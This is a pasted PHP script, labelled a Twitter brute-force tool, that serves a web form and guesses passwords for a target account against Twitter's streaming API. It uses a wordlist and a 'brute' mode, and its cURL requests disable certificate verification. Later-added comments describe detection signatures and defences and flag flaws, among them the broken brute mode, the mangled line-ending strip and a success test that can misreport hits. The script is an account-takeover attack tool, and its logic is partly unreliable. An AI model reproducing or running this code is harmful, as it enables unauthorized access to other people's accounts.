
[PHP] Twitter Brute Force

a guest
Nov 4th, 2013
  1. <?php
  2. /////////////////////////////////////////////////////
  3. ////Twitter Brute Force By Mauritania Attacker//////
  4. ///////////////////////////////////////////////////
  5.  
  6. ///////////////////////////////////////////////////
  7. ////Changing Description won't make you the Coder/
  8. /////////////////////////////////////////////////
  9.  
  10.  
  11. ////////////////////////////////////////////////////////////////////////////
  12. # This script was created to Brute Force Twitter Logins,#
  13. #it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
  14. ///////////////////////////////////////////////////////////////////////////
  15.  
  16. $dic ="pass.txt"; // wordlist file name, relative to the script's working directory; read later with file()
  17. //////////////////////////////////////////////////////////////////////////
  18.  
  19.  
  20.  
      // Emits the operator-facing page in a single echo: a POST form with one text field
      // (`username`) and two submit buttons sharing the name `attack` (values `dictionary`
      // and `brute`). Nothing in the visible code restricts who may submit the form, so
      // wherever this file is web-reachable any visitor can make the host send outbound
      // login attempts. The <title> text is a fixed string, usable as a content signature
      // when sweeping web roots for this file.
  21. echo "
  22. <title>Twitter Brute Force By Mauritania Attacker</title>
  23. </head>
  24. <style type='text/css'>
  25. body {
  26.  
  27.  
  28. font:Verdana, Arial, Helvetica, sans-serif;
  29. font-size:12px;
  30. border-color:#FFFFFF;
  31. }
  32. .raster_table {
  33. background-color:BLUE;
  34. border-color:#CCCCCC;
  35. }
  36. .alert {
  37. color:#FF0000;
  38. }
  39. </style>
  40. <body>
  41. <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
  42. <tr>
  43. <td>
  44. <div align='center'><b>Twitter Brute Force [PHP] By Mauritania Attacker</b></div>
  45. </td>
  46. </tr>
  47. </table>
  48. <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
  49. <tr>
  50. <td>
  51. <div align='center'>
  52.  
  53. </div>
  54. </td>
  55. </tr>
  56. <tr>
  57. <td>
  58. <div align='center'>
  59.  
  60. </div>
  61. </td>
  62. </tr>
  63. <tr>
  64. <td>
  65. <div align='center'>
  66. <form method='post'>
  67. Target User:<br>
  68. <input name='username' type='text' /><br><br>
  69. <input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br>
  70. </form>
  71. </div>
  72. </td>
  73. </tr>
  74. <tr>
  75. <td>
  76. <div align='center'>
  77.  
  78. </div>
  79. </td>
  80. </tr>
  81. </table>
  82. ";
  83. // Sets up shared request state and retrieves Twitter's error response for later comparison.
      // Runs only when both POST fields are present. The request below carries no credentials;
      // its body is stored in $wrong and later treated as "what a rejected login looks like".
  84. if(isset($_POST['attack']) && isset($_POST['username'])) {
  85. $username = $_POST['username']; // taken from the request as-is; no validation or encoding here
      // Fixed header set, reused unchanged by check_correct() for every attempt. Server-side this
      // is a constant fingerprint: a pinned Firefox/23.0 / Windows NT 6.1 User-Agent, French-first
      // Accept-Language, and a request-side Date header (presumably uncommon in browser traffic).
  86. $headers = array(
  87. "Host: stream.twitter.com",
  88. "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0",
  89. "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
  90. "Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3",
  91. "Accept-Encoding: text", # non-standard value; per the original author, meant to avoid gzip bodies
  92. "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
  93. "Date: ".date(DATE_RFC822) // built from the local clock at request time
  94. );
  95. $c = curl_init('https://stream.twitter.com/1/statuses/filter.json');
  96. curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // let libcurl use any HTTP auth scheme the server offers
  97. curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // attach the fixed header set built above
  98. curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // return the body as a string instead of printing it
  99. curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // follow redirects
  100. curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); // certificate chain is NOT verified: the TLS peer is unauthenticated
  101. curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); // NOTE(review): 2 is the value documented for hostname checking; the effect of 1 depends on the libcurl version - confirm
  102. curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // keep sending credentials after a redirect, even to a different host
  103. $wrong = curl_exec($c); // reference body for the request made without credentials
  104. curl_close($c); // release the curl handle
  105. }
  106. // Dictionary mode: tries each line of the wordlist against the target account, in file order.
       // There is one check_correct() call (one curl transfer) per candidate, with no delay, retry
       // limit or cap in the visible code. Server-side this shows up as a dense run of failed
       // Basic-auth attempts for a single account from one source address. Controls that blunt
       // the pattern: per-account and per-source attempt throttling, lockout or step-up after
       // repeated failures, multi-factor authentication, and not accepting password Basic auth
       // on API endpoints.
  107. if($_POST['attack'] == "dictionary") { // read without isset(), so this is evaluated on every page load
  108. $Dictionary = file("$dic"); // whole wordlist loaded into memory, one array entry per line
  109. for ($Position = 0; $Position < count($Dictionary); $Position++) {
  110. $Dictionary[$Position] = str_replace("rn", "", $Dictionary[$Position]); // removes the literal character pair "rn" wherever it occurs in the entry
  111. if(check_correct($username, $Dictionary[$Position])) {
       // On a reported hit, execution stops here and the candidate and account name are printed.
       // Both values are concatenated into HTML without escaping, and $username comes straight
       // from the request, so this page reflects request input into its own markup.
  112. die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
  113. <tr>
  114. <td>
  115. <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
  116. </td>
  117. </tr>
  118. </table>
  119. </body>
  120. </html>");
  121. }
  122. }
       // Reached only when no candidate was reported as a hit; $username is again echoed unescaped.
  123. echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
  124. <tr>
  125. <td>
  126. <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionar
  127. y attack.</b></div>
  128. </td>
  129. </tr>
  130. </table>";
  131. }
  132. // Brute mode. As written it does not enumerate a keyspace: both arms of the conditional
       // below assign the same one-character literal.
       // NOTE(review): how the loop proceeds after that assignment depends on PHP's string
       // increment and loose int/string comparison rules, which differ between PHP versions -
       // confirm before relying on any description of its runtime.
  133. elseif($_POST['attack'] == "brute") {
  134. for ($Pass = 0; $Pass < 2; $Pass++) {
  135. if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
  136. if(check_correct($username, $Pass)) {
       // The message below reads $Dictionary[$Position], which only the dictionary branch assigns.
  137. die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
  138. <tr>
  139. <td>
  140. <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
  141. </td>
  142. </tr>
  143. </table>
  144. </body>
  145. </html>");
  146. }
  147. }
  148. echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
  149. <tr>
  150. <td>
  151. <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute for
  152. ce attack.</b></div>
  153. </td>
  154. </tr>
  155. </table>";
  156. }
       // Closes the <body> opened by the first echo; skipped when a die() above has already ended the script.
  157. echo "</body>
  158. </html>";
  159. // Reports whether a username/password pair appears to be accepted by the endpoint.
       //
       // @param $username  account name as received from the form, placed in the URL's userinfo part as-is
       // @param $password  candidate password, placed in the URL the same way
       // @return bool      true when the response body differs from the reference body in $wrong
       //
       // "Differs from the reference" is the only success test. A rate-limit page, a lockout
       // notice, a changed error body or a failed transfer (curl_exec() returning false) can also
       // compare unequal and be reported as a hit, so this tool's output alone is not evidence
       // that a credential is valid.
       // Neither value is URL-encoded before concatenation, so reserved characters in either one
       // change how the URL is parsed.
  160. function check_correct($username, $password)
  161. {
  162. global $wrong, $headers; // reference body and header set prepared by the top-level script
  163. $c = curl_init('https://'.$username.':'.$password.'@stream.twitter.com/1/statuses/filter.json');
  164. curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // let libcurl use any HTTP auth scheme the server offers
  165. curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // same fixed header set on every attempt
  166. curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // return the body as a string instead of printing it
  167. curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // follow redirects
  168. curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); // certificate chain is NOT verified: credentials go to an unauthenticated TLS peer
  169. curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); // NOTE(review): 2 is the value documented for hostname checking; the effect of 1 depends on the libcurl version - confirm
  170. curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // keep sending credentials after a redirect, even to a different host
  171. $str = curl_exec($c); // response body, or false when the transfer failed
  172. curl_close($c);
  173. if($str != $wrong) {return true;} // loose comparison against the reference body
  174. else {return false;}
  175. }
  176.  
  177. ?>